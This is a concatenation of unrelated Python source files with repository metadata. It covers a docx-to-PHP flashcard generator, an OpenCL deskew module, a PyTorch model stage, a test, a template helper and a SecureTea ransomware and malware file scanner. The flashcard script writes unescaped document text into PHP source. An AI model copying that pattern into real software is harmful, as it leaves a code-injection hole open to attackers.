DOK_PATH = line.lstrip('DOK_PATH="')
DOK_PATH = DOK_PATH.rstrip('"\n')
elif "QUESTION_START" in line:
LINE_START = line.lstrip('QUESTION_START="')
LINE_START = LINE_START.rstrip('"\n')
elif "SEPERATOR" in line:
SEPERATOR = line.lstrip('SEPERATOR="')
SEPERATOR = SEPERATOR.rstrip('"\n')
return ROOT_PATH, DOK_PATH, LINE_START, SEPERATOR
ROOT_PATH, DOK_PATH, LINE_START, SEPERATOR = get_root()
def search_all(doc_directory):
# Alle docx Dateien im angegebenen Ordner finden
result_list = []
os.chdir(doc_directory)
file_list = os.walk(doc_directory)
for foldername in file_list:
for filename in foldername[2]:
if filename.endswith("docx") and not filename.endswith("beispiel.docx"):
writeLogfile(filename, "search_all")
result_list += [foldername[0]+"\\"+filename]
process_files(result_list)
def process_files(array, ignore=0):
# Erstelle Fragen-Array
found_questions = {}
for name in array:
found_questions = process_dox(found_questions, name)
create_files(found_questions)
def process_dox(found_questions, name):
# Lese jede Zeile aus dem Worddokument aus und prüfe diese auf das Suchmuster
try:
doc_file = docx.Document(name)
for i in range(len(doc_file.paragraphs)):
if LINE_START+SEPERATOR in doc_file.paragraphs[i].text:
raw_question = doc_file.paragraphs[i].text
raw_question = raw_question.lstrip(LINE_START+SEPERATOR).split(SEPERATOR)
writeLogfile(raw_question, "process_dox")
found_questions.setdefault(raw_question[0], [])
found_questions[raw_question[0]] += [(raw_question[1], raw_question[2], name)]
except:
pass
return found_questions
def create_files(questions, root_dir = ROOT_PATH):
# Erstelle Files anhand der gefundenen Daten
count=0
writeLogfile(questions, "create_file")
for fach in questions.keys():
if "/" in fach:
temp_array = []
path = fach.split("/")
for entry in path:
temp_array += [entry.capitalize()]
path = "/".join(temp_array)
else:
path = fach.capitalize()
writeLogfile(root_dir+"/cards/"+path, "create_file")
if not os.path.exists(root_dir+"/cards/"+path):
os.mkdir(root_dir+"/cards/"+path)
current_dir = root_dir+"/cards/"+path
for frage in questions[fach]:
# Generiere Dateiname aus Hashwert der Frage
filename = hashlib.md5(bytes(frage[0], "utf-8"))
filename = filename.hexdigest()+".php"
if not os.path.exists(current_dir+"\\"+filename):
writeLogfile(current_dir+"\\"+filename, "create_file")
question = '"'+frage[0]+'"'
answer = '"'+frage[1]+'"'
file_path = '"'+frage[2]+'"'
file_path = file_path.split("\\")
file_path = "/".join(file_path)
writeLogfile("Q:{} A:{} P:{}".format(question, answer, file_path), "create_file")
output = "<?php\n\t$q = {};\n\t$a = {};\n\t$f = {};\n\t$s = 0;\n\t$ra = 0;\n\t$fa = 0;\n?>".format(question, answer, file_path)
file_writer = open(current_dir+"/"+filename, "w", encoding="utf-8")
file_writer.write(output)
file_writer.close()
count+=1
print("<div class='output_message good'>Karteikarten erstellt: "+str(count)+'</div>')
def search_folder():
folder = argv[2]
writeLogfile(folder, "search_folder")
if folder.endswith('"'):
folder = folder.strip('"')
if os.path.exists(folder) and os.path.isdir(folder):
search_all(doc_directory=folder)
else:
print("<div class='output_message error'>Pfad ungültig "+argv[2]+"</div>")
def search_file():
filename = argv[2]
writeLogfile(filename, "search_file")
if filename.endswith('"'):
filename = filename.strip('"')
if os.path.exists(filename) and os.path.isfile(filename):
found_questions = process_dox({}, filename)
create_files(found_questions)
else:
print("<div class='output_message error'>Dateipfad ungültig"+argv[2]+"</div>")
def add_data(root_dir = ROOT_PATH+"\\cards"):
writeLogfile(root_dir, "add_data")
if os.path.exists(root_dir+'\\'+argv[4]):
fach = argv[4]
frage = argv[2]
antwort = argv[3]
if fach != "" and frage != "" and antwort != "":
question_array = {fach : [(frage, antwort, "Manuell erstellt")]}
create_files(question_array)
else:
print("<div class='output_message error'>Fehlende Angaben</div>")
else:
print("<div class='output_message error'>Fehlerhafte Ordnerangabe</div>")
# search_all(DOK_PATH)
def writeLogfile(message, origin):
if DEBUG:
file_writer = open(r"C:\xampp\htdocs\lernkarten\logfile.log", "a+", encoding="utf-8")
file_writer.write("{}: {}\n".format(origin, message))
file_writer.close()
if argv[1] == "all":
search_all(DOK_PATH)
elif argv[1] == "dir":
search_folder()
elif argv[1] == "file":
search_file()
elif argv[1] == "manadd":
add_data()
# elif argv[1] == "test":
# print('<div class="output_message info">test erfolgreich</div>')
| 35.983696
| 143
| 0.601722
|
4a15a78a4e97ed01a99cbb2170187b67fd9da1b1
| 11,660
|
py
|
Python
|
napari_ndtiffs/affine.py
|
adamltyson/napari-ndtiffs
|
dcb00e68dedb0d3a618fe1dc47135051b82b1db8
|
[
"BSD-3-Clause"
] | null | null | null |
napari_ndtiffs/affine.py
|
adamltyson/napari-ndtiffs
|
dcb00e68dedb0d3a618fe1dc47135051b82b1db8
|
[
"BSD-3-Clause"
] | null | null | null |
napari_ndtiffs/affine.py
|
adamltyson/napari-ndtiffs
|
dcb00e68dedb0d3a618fe1dc47135051b82b1db8
|
[
"BSD-3-Clause"
] | null | null | null |
"""Deskew utilities"""
import logging
from functools import lru_cache
import numpy as np
logger = logging.getLogger(__name__)
cl = None
try:
import pyopencl as cl
from pyopencl.array import empty, to_device
logger.info("Using pyopencl for affine transforms")
except ImportError:
try:
from scipy.ndimage.interpolation import affine_transform
logger.warning(
"Could not import pyopencl. "
"Falling back to scipy for CPU affine transforms"
)
except ImportError:
logger.warning(
"Could not import pyopencl or scipy."
"Cannot perform deskew. Please install one of those packages."
)
affine_transform = None
affine_source = """
#ifndef SAMPLER_FILTER
#define SAMPLER_FILTER CLK_FILTER_LINEAR
#endif
#ifndef SAMPLER_ADDRESS
#define SAMPLER_ADDRESS CLK_ADDRESS_CLAMP
#endif
#ifndef DTYPE
#define DTYPE float
#endif
__kernel void affine3D(__read_only image3d_t input, __global DTYPE *output,
__constant float *mat) {
const sampler_t sampler = SAMPLER_ADDRESS | SAMPLER_FILTER;
uint i = get_global_id(0);
uint j = get_global_id(1);
uint k = get_global_id(2);
float x = i;
float y = j;
float z = k;
float x2 = (mat[8] * z + mat[9] * y + mat[10] * x + mat[11]) + 0.5f;
float y2 = (mat[4] * z + mat[5] * y + mat[6] * x + mat[7]) + 0.5f;
float z2 = (mat[0] * z + mat[1] * y + mat[2] * x + mat[3]) + 0.5f;
uint Nx = get_global_size(0);
uint Ny = get_global_size(1);
float4 coord_norm = (float4)(x2, y2, z2, 0.f);
output[i + Nx * j + Nx * Ny * k] = read_imagef(input, sampler, coord_norm).x;
}
"""
class holder:
pass
GPU = holder()
def get_best_device():
return sorted(
[
device
for platform in cl.get_platforms()
for device in platform.get_devices()
],
key=lambda x: x.type * 1e12 + x.get_info(cl.device_info.GLOBAL_MEM_SIZE),
reverse=True,
)[0]
def get_gpu(reload=False):
if reload or not hasattr(GPU, "device"):
GPU.device = get_best_device()
GPU.ctx = cl.Context(devices=[GPU.device])
GPU.queue = cl.CommandQueue(GPU.ctx)
return GPU
@lru_cache(maxsize=128)
def get_affine_program(ctx, order: int = 1, mode="constant"):
orders = [
["-D", "SAMPLER_FILTER=CLK_FILTER_NEAREST"],
["-D", "SAMPLER_FILTER=CLK_FILTER_LINEAR"],
]
modes = {
"constant": ["-D", "SAMPLER_ADDRESS=CLK_ADDRESS_CLAMP"],
"wrap": ["-D", "SAMPLER_ADDRESS=CLK_ADDRESS_REPEAT"],
"edge": ["-D", "SAMPLER_ADDRESS=CLK_ADDRESS_CLAMP_TO_EDGE"],
"nearest": ["-D", "SAMPLER_ADDRESS=CLK_ADDRESS_CLAMP_TO_EDGE"],
"mirror": ["-D", "SAMPLER_ADDRESS=CLK_ADDRESS_MIRRORED_REPEAT"],
}
affine_prg = cl.Program(ctx, affine_source)
affine_prg.build(options=orders[order] + modes[mode])
return affine_prg
def _debug_context(ctx):
print(
cl.get_supported_image_formats(
ctx, cl.mem_flags.READ_WRITE, cl.mem_object_type.IMAGE3D
)
)
for device in ctx.devices:
print("DEVICE: ", device)
for attr in dir(device):
if attr.startswith("image"):
print(f" {attr}", getattr(device, attr))
@lru_cache(maxsize=32)
def _get_image_format(ctx, num_channels, dtype, ndim, mode="rw"):
"""Maximize chance of finding a supported image format."""
if mode == "rw":
mode_flag = cl.mem_flags.READ_WRITE
elif mode == "r":
mode_flag = cl.mem_flags.READ_ONLY
elif mode == "w":
mode_flag = cl.mem_flags.WRITE_ONLY
else:
raise ValueError("invalid value '%s' for 'mode'" % mode)
if ndim == 3:
_dim = cl.mem_object_type.IMAGE3D
elif ndim == 2:
_dim = cl.mem_object_type.IMAGE2D
elif ndim == 1:
_dim = cl.mem_object_type.IMAGE1D
else:
raise ValueError(f"Unsupported number of image dimensions: {ndim}")
supported_formats = cl.get_supported_image_formats(ctx, mode_flag, _dim)
channel_type = cl.DTYPE_TO_CHANNEL_TYPE[dtype]
if num_channels == 1:
for order in [
cl.channel_order.INTENSITY,
cl.channel_order.R,
cl.channel_order.Rx,
]:
fmt = cl.ImageFormat(order, channel_type)
if fmt in supported_formats:
return fmt, 0
fmt = cl.ImageFormat(cl.channel_order.RGBA, channel_type)
if fmt in supported_formats:
return fmt, 1
raise ValueError(
f"No supported ImageFormat found for dtype {dtype} with 1 channel\n",
f"Supported formats include: {supported_formats}",
)
img_format = {
2: cl.channel_order.RG,
3: cl.channel_order.RGB,
4: cl.channel_order.RGBA,
}[num_channels]
return cl.ImageFormat(img_format, channel_type), 0
# vendored from pyopencl.image_from_array so that we can change the img_format
# used for a single channel image to channel_order.INTENSITY
def _image_from_array(ctx, ary, num_channels=None, mode="r", norm_int=False):
if not ary.flags.c_contiguous:
raise ValueError("array must be C-contiguous")
dtype = ary.dtype
if num_channels is None:
import pyopencl.cltypes
try:
dtype, num_channels = pyopencl.cltypes.vec_type_to_scalar_and_count[dtype]
except KeyError:
# It must be a scalar type then.
num_channels = 1
shape = ary.shape
strides = ary.strides
elif num_channels == 1:
shape = ary.shape
strides = ary.strides
else:
if ary.shape[-1] != num_channels:
raise RuntimeError("last dimension must be equal to number of channels")
shape = ary.shape[:-1]
strides = ary.strides[:-1]
if mode == "r":
mode_flags = cl.mem_flags.READ_ONLY
elif mode == "w":
mode_flags = cl.mem_flags.WRITE_ONLY
else:
raise ValueError("invalid value '%s' for 'mode'" % mode)
img_format, reshape = _get_image_format(ctx, num_channels, dtype, ary.ndim)
if reshape:
import warnings
warnings.warn("Device support forced reshaping of single channel array to RGBA")
ary = np.ascontiguousarray(np.repeat(ary[..., np.newaxis], 4, axis=-1))
shape = ary.shape[:-1]
strides = ary.strides[:-1]
assert ary.strides[-1] == ary.dtype.itemsize
return cl.Image(
ctx,
mode_flags | cl.mem_flags.COPY_HOST_PTR,
img_format,
shape=shape[::-1],
pitches=strides[::-1][1:],
hostbuf=ary,
)
def image_from_array(arr, ctx, *args, **kwargs):
if arr.ndim not in {2, 3, 4}:
raise ValueError(
"dimension of array wrong, should be 2 - 4 but is %s" % arr.ndim
)
if arr.dtype.type == np.complex64:
num_channels = 2
res = cl.Image.empty(arr.shape, dtype=np.float32, num_channels=num_channels)
res.write_array(arr)
res.dtype = np.float32
else:
num_channels = arr.shape[-1] if arr.ndim == 4 else 1
res = _image_from_array(
ctx, np.ascontiguousarray(arr), num_channels=num_channels, *args, **kwargs
)
res.dtype = arr.dtype
res.num_channels = num_channels
res.ndim = arr.ndim
return res
if cl:
def affine_transform(
input,
matrix,
offset=0.0,
output_shape=None,
output=None,
order=0,
mode="constant",
cval=0.0,
prefilter=None,
):
"""[summary]
Parameters
----------
input : array_like
The input array.
matrix : ndarray
The inverse coordinate transformation matrix, mapping output
coordinates to input coordinates. If ``ndim`` is the number of
dimensions of ``input``, the given matrix must have one of the
following shapes:
offset : float or sequence, optional
The offset into the array where the transform is applied. If a float,
`offset` is the same for each axis. If a sequence, `offset` should
contain one value for each axis.
output_shape : tuple of ints, optional
Shape tuple.
output : array or dtype, optional
The array in which to place the output, or the dtype of the returned array.
By default an array of the same dtype as input will be created.
order : int, optional
The order of the spline interpolation, default is 0.
The order has to be in the range 0-1. (bi-cubic not yet supported)
mode : {constant', 'nearest', 'mirror', 'wrap'}, optional
The mode parameter determines how the input array is extended beyond its
boundaries. Default is 'constant'. Behavior for each valid value is as follows:
- 'constant' (k k k k | a b c d | k k k k)
The input is extended by filling all values beyond the edge with the same
constant value, defined by the cval parameter.
- 'nearest' (a a a a | a b c d | d d d d)
The input is extended by replicating the last pixel.
- 'mirror' (d c b | a b c d | c b a)
The input is extended by reflecting about the center of the last pixel.
- 'wrap' (a b c d | a b c d | a b c d)
The input is extended by wrapping around to the opposite edge.
cval : scalar, optional
Value to fill past edges of input if mode is ‘constant’. Default is 0.0.
prefilter : bool, optional
not supported
"""
if order < 0 or order > 1:
raise NotImplementedError(
"spline orders other than 0 or 1 not yet supported"
)
out_shape = input.shape if output_shape is None else output_shape
if prefilter is not None:
raise NotImplementedError("prefilter is not yet supported")
gpu = get_gpu()
affine3D = get_affine_program(gpu.ctx, order, mode).affine3D
dev_img = image_from_array(input.astype(np.float32, copy=False), gpu.ctx)
res_g = empty(gpu.queue, out_shape, np.float32)
mat_inv_g = to_device(gpu.queue, np.require(matrix, np.float32, "C"))
affine3D(gpu.queue, out_shape[::-1], None, dev_img, res_g.data, mat_inv_g.data)
return res_g.get()
def deskew_block(block, mat=None, out_shape=None, padval=0):
extradims = block.ndim - 3
last3dims = (0,) * extradims + (slice(None),) * 3
array = block[last3dims]
deskewed = affine_transform(array, mat, output_shape=tuple(out_shape[-3:]), order=0)
return deskewed[(None,) * extradims + (...,)]
deskew_counter = 0
def get_deskew_func(shape, dz=0.5, dx=0.1, angle=31.5, padval=0):
# calculate affine matrix from globals
deskewFactor = np.cos(np.deg2rad(angle)) * dz / dx
mat = np.eye(4)
mat[2, 0] = -deskewFactor
# calculate shape of output array
(nz, ny, nx) = shape[-3:]
out_shape = [1] * (len(shape) - 3) + list(shape[-3:])
# new nx
out_shape[-1] = np.int(np.floor((nz - 1) * -mat[2, 0]) + nx)
new_dzdx_ratio = np.sin(np.deg2rad(angle)) * dz / dx
def noisy_deskew(arr):
# to see, set: logging.getLogger("napari_ndtiffs").setLevel(logging.DEBUG)
global deskew_counter
deskew_counter += 1
logger.debug(f"deskew #{deskew_counter}")
return deskew_block(arr, mat=mat, out_shape=out_shape, padval=padval)
return noisy_deskew, out_shape, new_dzdx_ratio
| 31.598916
| 91
| 0.613808
|
4a15a821b710253ad67c78439d49282b799bfd96
| 2,312
|
py
|
Python
|
runtime/image_classification/models/resnet50/gpus=2/stage2.py
|
vibhatha/pipedream
|
af6b811f5d01a68e9eb91065e5242fc1a075f279
|
[
"MIT"
] | null | null | null |
runtime/image_classification/models/resnet50/gpus=2/stage2.py
|
vibhatha/pipedream
|
af6b811f5d01a68e9eb91065e5242fc1a075f279
|
[
"MIT"
] | null | null | null |
runtime/image_classification/models/resnet50/gpus=2/stage2.py
|
vibhatha/pipedream
|
af6b811f5d01a68e9eb91065e5242fc1a075f279
|
[
"MIT"
] | null | null | null |
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import torch
class Stage2(torch.nn.Module):
def __init__(self):
super(Stage2, self).__init__()
self.layer2 = torch.nn.Conv2d(1024, 2048, kernel_size=(1, 1), stride=(2, 2), bias=False)
self.layer3 = torch.nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layer4 = torch.nn.ReLU(inplace=True)
self.layer5 = torch.nn.Conv2d(512, 2048, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layer6 = torch.nn.BatchNorm2d(2048, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layer7 = torch.nn.BatchNorm2d(2048, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layer9 = torch.nn.ReLU(inplace=True)
self.layer10 = torch.nn.Conv2d(2048, 512, kernel_size=(1, 1), stride=(1, 1), bias=False)
self.layer11 = torch.nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.layer12 = torch.nn.ReLU(inplace=True)
self.layer13 = torch.nn.Conv2d(512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
self.layer14 = torch.nn.BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self._initialize_weights()
def forward(self, input0, input1):
out0 = input1.clone()
out1 = input0.clone()
out2 = self.layer2(out1)
out3 = self.layer3(out0)
out4 = self.layer4(out3)
out5 = self.layer5(out4)
out6 = self.layer6(out2)
out7 = self.layer7(out5)
out6 += out7
out9 = self.layer9(out6)
out10 = self.layer10(out9)
out11 = self.layer11(out10)
out12 = self.layer12(out11)
out13 = self.layer13(out12)
out14 = self.layer14(out13)
return (out9, out14)
def _initialize_weights(self):
for m in self.modules():
if isinstance(m, torch.nn.Conv2d):
torch.nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
elif isinstance(m, torch.nn.BatchNorm2d):
torch.nn.init.constant_(m.weight, 1)
torch.nn.init.constant_(m.bias, 0)
| 46.24
| 113
| 0.620242
|
4a15a8eba1dded74673be151dd2ab9421d6d23a1
| 523
|
py
|
Python
|
biobb_amber/test/unitests/test_pdb4amber/test_pdb4amber_pdb4amber.py
|
bioexcel/biobb_amber
|
84c61d07158ada71e0bce0fd99216a1b49e21787
|
[
"Apache-2.0"
] | null | null | null |
biobb_amber/test/unitests/test_pdb4amber/test_pdb4amber_pdb4amber.py
|
bioexcel/biobb_amber
|
84c61d07158ada71e0bce0fd99216a1b49e21787
|
[
"Apache-2.0"
] | 1
|
2021-09-23T06:30:35.000Z
|
2021-09-23T10:11:16.000Z
|
biobb_amber/test/unitests/test_pdb4amber/test_pdb4amber_pdb4amber.py
|
bioexcel/biobb_amber
|
84c61d07158ada71e0bce0fd99216a1b49e21787
|
[
"Apache-2.0"
] | null | null | null |
from biobb_common.tools import test_fixtures as fx
from biobb_amber.pdb4amber.pdb4amber_run import pdb4amber_run
class TestPdb4amberRun():
def setUp(self):
fx.test_setup(self, 'pdb4amber_run')
def tearDown(self):
fx.test_teardown(self)
pass
def test_pdb4amber_run(self):
pdb4amber_run(properties=self.properties, **self.paths)
assert fx.not_empty(self.paths['output_pdb_path'])
assert fx.equal(self.paths['output_pdb_path'], self.paths['ref_output_pdb_path'])
| 32.6875
| 89
| 0.720841
|
4a15a9704766214fd79a88d3ded01d8965e954ab
| 374
|
py
|
Python
|
mkt/operators/helpers.py
|
muffinresearch/zamboni
|
045a6f07c775b99672af6d9857d295ed02fe5dd9
|
[
"BSD-3-Clause"
] | null | null | null |
mkt/operators/helpers.py
|
muffinresearch/zamboni
|
045a6f07c775b99672af6d9857d295ed02fe5dd9
|
[
"BSD-3-Clause"
] | null | null | null |
mkt/operators/helpers.py
|
muffinresearch/zamboni
|
045a6f07c775b99672af6d9857d295ed02fe5dd9
|
[
"BSD-3-Clause"
] | null | null | null |
import jinja2
from jingo import register
from tower import ugettext_lazy as _lazy
from mkt.developers.helpers import mkt_page_title
@register.function
@jinja2.contextfunction
def operators_page_title(context, title=None):
section = _lazy('Operator Dashboard')
title = u'%s | %s' % (title, section) if title else section
return mkt_page_title(context, title)
| 24.933333
| 63
| 0.772727
|
4a15a999cc7a530427c2f5c81b8f8aed5cb67e46
| 146
|
py
|
Python
|
app/worker_service/core/loggers.py
|
TheRayOfSeasons/worker-heavy-cicd
|
fa36e89dd68ee2fd8b37bda55d6bb885f31afaa7
|
[
"MIT"
] | null | null | null |
app/worker_service/core/loggers.py
|
TheRayOfSeasons/worker-heavy-cicd
|
fa36e89dd68ee2fd8b37bda55d6bb885f31afaa7
|
[
"MIT"
] | null | null | null |
app/worker_service/core/loggers.py
|
TheRayOfSeasons/worker-heavy-cicd
|
fa36e89dd68ee2fd8b37bda55d6bb885f31afaa7
|
[
"MIT"
] | null | null | null |
"""
A script that imports a standartd centralized logger.
"""
import logging
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
| 16.222222
| 53
| 0.773973
|
4a15ab6455d2609849fd95761c48dd0795890408
| 756
|
py
|
Python
|
code_builder.py
|
LiXuanqi/neeko
|
6a8978282dfb8d7ed0cb7fd2bfa0f662906cd12f
|
[
"MIT"
] | null | null | null |
code_builder.py
|
LiXuanqi/neeko
|
6a8978282dfb8d7ed0cb7fd2bfa0f662906cd12f
|
[
"MIT"
] | null | null | null |
code_builder.py
|
LiXuanqi/neeko
|
6a8978282dfb8d7ed0cb7fd2bfa0f662906cd12f
|
[
"MIT"
] | null | null | null |
class CodeBuilder:
INDENT_STEP = 4
def __init__(self, indent=0):
self.code = []
self.indentLevel = indent
def addLine(self, line):
self.code.extend([" " * self.indentLevel, line, "\n"])
def indent(self):
self.indentLevel += self.INDENT_STEP
def dedent(self):
self.indentLevel -= self.INDENT_STEP
def addSection(self):
section = CodeBuilder(self.indentLevel)
self.code.append(section)
return section
def __str__(self):
return "".join(str(c) for c in self.code)
def getGlobals(self):
assert self.indentLevel == 0
source = str(self)
globalNamespace = {}
exec (source, globalNamespace)
return globalNamespace
| 24.387097
| 62
| 0.603175
|
4a15ab78bac9706b48af3145400d4556d26bc6ad
| 11,555
|
py
|
Python
|
securetea/lib/malware_analysis/continuous_malware_defence.py
|
Off3nsiv3huNt/SecureTea-Project
|
ae55082d4a342f10099db4dead23267a517e1a66
|
[
"MIT"
] | 257
|
2018-03-28T12:43:20.000Z
|
2022-03-29T07:07:23.000Z
|
securetea/lib/malware_analysis/continuous_malware_defence.py
|
Off3nsiv3huNt/SecureTea-Project
|
ae55082d4a342f10099db4dead23267a517e1a66
|
[
"MIT"
] | 155
|
2018-03-31T14:57:46.000Z
|
2022-03-17T18:12:41.000Z
|
securetea/lib/malware_analysis/continuous_malware_defence.py
|
Off3nsiv3huNt/SecureTea-Project
|
ae55082d4a342f10099db4dead23267a517e1a66
|
[
"MIT"
] | 132
|
2018-03-27T06:25:20.000Z
|
2022-03-28T11:32:45.000Z
|
# !/bin/python
# -*- coding: utf-8 -*-
u"""SecureTea Social Engineering
Project:
╔═╗┌─┐┌─┐┬ ┬┬─┐┌─┐╔╦╗┌─┐┌─┐
╚═╗├┤ │ │ │├┬┘├┤ ║ ├┤ ├─┤
╚═╝└─┘└─┘└─┘┴└─└─┘ ╩ └─┘┴ ┴
Author: Digvijay Bhosale <digvijayb1729@gmail.com> August 19 2021
Version: 1.0
Module: SecureTea
"""
import subprocess
import os
import time
import datetime
import pandas
import json
import threading
from securetea.lib.malware_analysis import malwareAnalysis
from securetea.lib.malware_analysis import malwareAnalysisJSONDisplay
from securetea.lib.malware_analysis import globals
class ContinuousDefence(threading.Thread):
def __init__(self, gui=True, API_KEY=None):
threading.Thread.__init__(self)
self.gui = gui
self.API_KEY = API_KEY
self.mal_extensions = ['exe',
'doc', 'docx', 'docm', 'rtf',
'xls', 'xlsx',
'hta', 'html', 'htm',
'js', 'jar',
'py',
'vbs', 'vb',
'pdf',
'sfx', 'dll', 'bat', 'tmp', '.py', 'scr', 'zip', '7z', 'bz', 'gz', 'com',
'jpeg', 'jpg', 'png', 'mng'
]
self.high_threat_ext = ['exe',
'pdf'
]
self.djvu_ext = ['shadow', 'djvu', 'djvur', 'djvuu', 'udjvu', 'uudjvu', 'djvuq', 'djvus', 'djvur', 'djvut',
'pdff', 'tro', 'tfude', 'tfudet', 'tfudeq', 'rumba', 'adobe', 'adobee', 'blower', 'promos',
'promoz', 'promorad', 'promock', 'promok', 'promorad2', 'kroput', 'kroput1', 'pulsar1',
'kropun1', 'charck', 'klope', 'kropun', 'charcl', 'doples', 'luces', 'luceq', 'chech',
'proden', 'drume', 'tronas', 'trosak', 'grovas', 'grovat', 'roland', 'refols', 'raldug',
'etols', 'guvara', 'browec', 'norvas', 'moresa', 'vorasto', 'hrosas', 'kiratos', 'todarius',
'hofos', 'roldat', 'dutan', 'sarut', 'fedasot', 'berost', 'forasom', 'fordan', 'codnat',
'codnat1', 'bufas', 'dotmap', 'radman', 'ferosas', 'rectot', 'skymap', 'mogera', 'rezuc',
'stone', 'redmat', 'lanset', 'davda', 'poret', 'pidom', 'pidon', 'heroset', 'boston', 'muslat',
'gerosan', 'vesad', 'horon', 'neras', 'truke', 'dalle', 'lotep', 'nusar', 'litar', 'besub',
'cezor', 'lokas', 'godes', 'budak', 'vusad', 'herad', 'berosuce', 'gehad', 'gusau', 'madek',
'darus', 'tocue', 'lapoi', 'todar', 'dodoc', 'bopador', 'novasof', 'ntuseg', 'ndarod',
'access', 'format', 'nelasod', 'mogranos', 'cosakos', 'nvetud', 'lotej', 'kovasoh', 'prandel',
'zatrov', 'masok', 'brusaf', 'londec', 'krusop', 'mtogas', 'nasoh', 'nacro', 'pedro', 'nuksus',
'vesrato', 'masodas', 'cetori', 'stare', 'carote', 'gero', 'hese', 'seto', 'peta', 'moka',
'kvag', 'karl', 'nesa', 'noos', 'kuub', 'reco', 'bora', 'reig', 'tirp', 'plam', 'cosd', 'ygkz',
'cadq', 'ribd', 'qlkm', 'coos', 'wbxd', 'pola']
self.directory = ''
self.mal_files = {}
self.djvu_files = {}
globals.initialize()
globals.initialize_colours()
def run(self):
"""
program flow starts here
"""
while True:
try:
self.find_home()
# self.directory = '/home/fox/GSOC/OWASP/SecureTea-Dev/test_files'
self.find_malicious_extensions()
self.scan_mal_files()
print(globals.GRAY + 'Scan completed at : ' + str(datetime.datetime.now().time()) + globals.END)
if self.gui:
globals.ctime = str(datetime.datetime.now().time())
print(globals.GRAY + "Next Scan in 1 hour" + globals.END)
self.mal_files.clear()
self.djvu_files.clear()
time.sleep(3600)
# time.sleep(60)
except KeyboardInterrupt:
print(globals.WARNING + '\nKeyboardInterrupt... Quitting' + globals.END)
exit(0)
def dev_runner(self, files_dict): # implements threading. NOT A START POINT OF PROGRAM
"""
uses threading to send files to malwareAnalysis.py
Uses global variables from globals.py
Starts threads
Global vars intialized here
Edited in JSONDisplay.py
Accessed here again
"""
globals.detected.clear()
globals.undetected.clear()
globals.unsupported.clear()
globals.total.clear()
globals.report_id.clear()
# print(*list(self.mal_files.keys()), sep="\n")
thread_list = []
for mal_file in files_dict.keys():
t = threading.Thread(target=self.scan_mal_files_threading, args=(mal_file,))
thread_list.append(t)
t.start()
time.sleep(15)
for a_thread in thread_list:
a_thread.join()
'''
if len(self.mal_files.keys()) < 100:
print(globals.OKBLUE + 'Number of files < 100. Scanning all files' + globals.END)
for mal_file in self.mal_files.keys():
t = threading.Thread(target=self.scan_mal_files_threading, args=(mal_file,))
thread_list.append(t)
t.start()
time.sleep(15)
for a_thread in thread_list:
a_thread.join()
else:
print(globals.OKBLUE + 'Number of files > 100. Scanning important files only' + globals.END)
no_of_files_is_0 = True
for mal_file in self.mal_files.keys():
if self.mal_files[mal_file] in self.high_threat_ext:
no_of_files_is_0 = False
t = threading.Thread(target=self.scan_mal_files_threading, args=(mal_file,))
thread_list.append(t)
t.start()
time.sleep(15)
if no_of_files_is_0:
return 'detected', 'undetected', 'unsupported', 'total', 'report_id'
'''
return globals.detected, globals.undetected, globals.unsupported, globals.total, globals.report_id
def scan_mal_files_threading(self, filename):
mal_obj = malwareAnalysis.MalwareAnalysis(filename=filename, API_KEY=self.API_KEY)
mal_obj.threat_level_threading()
def find_home(self):
"""
finds home directory
"""
base_directory = '/home'
process = subprocess.Popen(['ls', base_directory],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
data = stdout.decode('utf-8')
stderr = stderr.decode('utf-8')
data = data.split('\n')
data = str(data[0])
# print(data)
self.directory = base_directory + '/' + data
def find_malicious_extensions(self):
"""
finds files modified last 1 hour with probablmalicious extensions. stores that in
self.djvu_files
self.mal_files
"""
process = subprocess.Popen(['find', self.directory, '-type', 'f', '-mmin', '-72'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
'''
1.2 hours because scan takes some time
in that time, user may download some files that may go unnoticed by our program
'''
stdout, stderr = process.communicate()
data = stdout.decode('utf-8')
stderr = stderr.decode('utf-8')
data = data.split('\n')
for filename in data:
temp = filename.split('/')[-1]
ext = temp.split('.')
if len(ext) == 1:
ext = ''
else:
ext = ext[-1]
if ext.lower() in self.djvu_ext:
print(globals.HEADER + 'DJVU Ransomware detected' + globals.END)
self.djvu_files[filename] = ext
elif ext.lower() in self.mal_extensions:
self.mal_files[filename] = ext
def scan_mal_files(self):
"""
Sends the mal files for scanning.
Takes 5 dicts from dev_runner
loads it into a dataframe
Prints table
"""
print(globals.HEADER + 'Total number of files changed in past 1 hour : ' + str(
len(self.mal_files.keys())) + globals.END)
for mal_file in self.mal_files.keys():
print(mal_file)
print(globals.HEADER + 'Total number of DJVU files found in past 1 hour : ' + str(
len(self.djvu_files.keys())) + globals.END)
for djvu_file in self.djvu_files.keys():
print(globals.ALERT + djvu_file + globals.END)
if len(self.djvu_files.keys()) != 0:
if self.gui:
for djvu_file in self.djvu_files:
globals.djvu_files.append(djvu_file)
# print("File in globals.djvu_files")
# no of mal files = 0
if len(self.mal_files.keys()) == 0:
return
crit_files = {}
# no of mal files < 100 --> scan all files
if len(self.mal_files.keys()) < 100:
print(globals.OKBLUE + 'Number of files < 100. Scanning all files' + globals.END)
detected, undetected, unsupported, total, report_id = self.dev_runner(files_dict=self.mal_files)
# if no of mal files > 100 --> scan critical files
else:
print(globals.OKBLUE + 'Number of files > 100. Scanning critical files only' + globals.END)
no_of_files_is_0 = True
for mal_file in self.mal_files.keys():
if self.mal_files[mal_file] in self.high_threat_ext:
print(mal_file)
no_of_files_is_0 = False
crit_files[mal_file] = self.mal_files[mal_file]
if no_of_files_is_0:
print('No Critical Files found')
return
else:
detected, undetected, unsupported, total, report_id = self.dev_runner(files_dict=crit_files)
mal_file_dict = {}
for mal_file in total.keys():
mal_file_dict[mal_file] = [detected[mal_file],
undetected[mal_file],
unsupported[mal_file],
total[mal_file],
report_id[mal_file]]
